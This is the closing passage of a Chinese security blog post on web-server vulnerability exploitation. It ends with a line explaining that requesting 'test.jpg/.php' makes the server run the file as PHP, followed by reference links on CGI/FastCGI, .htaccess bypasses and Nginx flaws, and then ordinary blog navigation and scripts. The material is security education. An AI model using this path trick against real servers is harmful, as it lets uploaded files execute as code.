所以输入<span class="hljs-selector-tag">test</span><span class="hljs-selector-class">.jpg</span>/<span class="hljs-selector-class">.php</span>就会当场<span class="hljs-selector-tag">php</span>处理</code></pre>

<p>参考: <a target="_blank" rel="noopener" href="https://www.cnblogs.com/tssc/p/10255590.html">关于CGI和FastCGI的理解 - 天生帅才 - 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/205098">.htaccess利用与Bypass方式总结 - 安全客，安全资讯平台 (anquanke.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6801">Web中间件漏洞总结之Nginx漏洞 - 先知社区 (aliyun.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6783">https://xz.aliyun.com/t/6783</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a>
                    
                  </div>
                
              </div>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/12/21/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">数据结构</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/11/22/Linux%E6%8F%90%E6%9D%83/">
                        <span class="hidden-mobile">Linux提权</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>





  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
